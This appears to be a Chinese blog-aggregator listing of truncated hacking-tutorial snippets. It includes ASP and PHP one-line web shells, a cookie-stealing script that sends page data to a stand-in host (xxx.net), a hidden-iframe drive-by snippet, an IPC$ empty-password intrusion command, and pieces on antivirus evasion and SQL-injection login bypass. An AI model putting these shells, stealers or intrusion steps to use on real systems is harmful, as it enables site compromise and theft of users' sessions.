七秒锺记忆
奇招防止IE主页修改
修改IE默认主页地址是恶意网页常用的一招,IE被修改后,会自动连接到恶意网页的地址。大家常用的方法是修改注册表,其实,只要简单给IE加个参数,就再也不害怕IE主页地址被修改了。右键点击桌面上的Ie...
污力胸毛
最佳的75个黑客安全工具
由于只有介绍,所以就不贴到工具版了。而来源的文章在结尾处的URL没有处理好,所以我也就花了几分钟修复了一下。信息来源:猪头党乐园因为是在nmap-hackers邮件列表中做出的评选,因此没有把nmap安全...- 0
- 0
- 0
- 0
- 0
江爷16053379
黑客经常使用工具集合
webadv:针对iis+sp3的溢出成功率很高(溢出后system权限!)ipscan:大范围网段快速ipc猜解svc:远程安装/删除Win2k服务3389.vbs:远程安装Win2k终端服务不需i386arpsniffer:arp环境sniffer(需要Winp...- 0
- 0
- 0
- 0
- 0
冰雨云
如何使用sqlcmd.exe 连接到数据库引擎
SQLServer支持使用TCP/IP网络协议(默认值)、命名管道协议和VIA协议的客户端通信。如果客户端要连接到同一计算机上的数据库引擎实例,则也可以使用共享内存协议。通常有三种选择协议的...- 0
- 0
- 0
- 0
- 0
不狠不能日刺猬
木马连接原理
正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他噶端口。而我们要知道距噶IP,先可以连接他。123就是他机器上开的端口由于到现在,宽带上网(动态IP)和路由器的普遍,这个软件就...- 0
- 0
- 0
- 0
- 0
日一姗
菜鸟是如何变成ASP木马高手的!
1.名称:如何制作图片ASP木马建一个asp文件,内容为<!--#includefile="ating.jpg"-->找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成...- 0
- 0
- 0
- 0
- 0
深情不及久伴w
详解挂马方法和技巧
1,挂马的N种方法(1)HTML挂马法。常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframesrc=http://www.xxx.com/horse.htmlwidth=0height=0></iframe>。查看站点是否被挂,一...- 0
- 0
- 0
- 0
- 0
亖呉㝋盀
139入侵简易教程
netuse\192.168.0.1ipc$Content$nbsp;""/user:administrator提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。首先,连接的命令是:net&l...- 0
- 0
- 0
- 0
- 0
联合国灭猫灭狗小组长
汇编揭开死循环的神秘面纱
i首先请大家看这么一个简单的小程序:#include <stdio.h>void main(){ int i, b[10]; for ( i = 0; i <=&n...- 0
- 0
- 0
- 0
- 0
yl
asp+js 偷取Cookies源代码
偷取Cookie,通过以下脚本引入一个js,document.write("<scriptsrc=XX.js></script>"),然后js内容为:varcode;vartarget="http://www.xxx.net/cookie.asp?";info=escape(document.loc...- 0
- 0
- 0
- 0
- 0
我是你身体长出的妖娆的花
木马免杀绝招以及常用的修改方法
常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤:第一步:用OD载入,来到程序的入口点。...常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤:第一步:用OD载入,来到程序的入口点。第...- 0
- 0
- 0
- 0
- 0
大胃贝壳汉姆
CSRF—攻击与防御
0x01什么是CSRF攻击CSRF是CrossSiteRequestForgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你...- 0
- 0
- 0
- 0
- 0
暗恋你的学生时代
冰河暗涌防不胜防 BIOS下实现的Telnet后门
该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。项目涉及的相关知识及技...- 0
- 0
- 0
- 0
- 0
北方的狼72913907
一句话木马(asp,php) 总结篇
asp一句话<%execute(request("1"))%>php一句话<?phpeval($_POST[1]);?>aspx一句话<scriptlanguage="C#"runat="server">WebAdmin2Y.x.yaaaaa=newWebAdmin2Y.x.y("add6bb58e13...- 0
- 0
- 0
- 0
- 0
约翰就越深v
黑客入侵网络的五十种方法
现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让大家做到有备无患。1.网宽网络有限公司制作的网站基本都有注入漏洞搜索网宽...- 0
- 1
- 0
- 0
- 0
x孔小强x
局域网入侵完全版
首先申明:1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。入侵工具:一般要用到...- 0
- 0
- 0
- 0
- 0
不许调戏小黄鸡
ASP注入万能登陆密码
《黑客手册》样刊里面,oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码:程序代码<%username=trim(Request.Form("username"))password=trim(Request.Form("password"))sql="...- 0
- 0
- 0
- 0
- 0
小姐别这样4
实战讲解跨站入侵攻击
很多时候在企业网络安全,特别是服务器上数据库安全防范方面需要特别注意,弥补所有漏洞,减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会听到一个新的名词——“跨站入侵...- 0
- 0
- 0
- 0
- 0
绯梦二十三_
判断数据库web是否分离的技巧
得到客户端主机名: select host_name(); 得到服务端主机名: select @@servername; 结果一样就极有可能未分离,结果不一样就是分离的 点评: 在实际的渗透过程中,我们常常会困惑数据库和...- 0
- 0
- 0
- 0
- 0
小怪兽i37508886
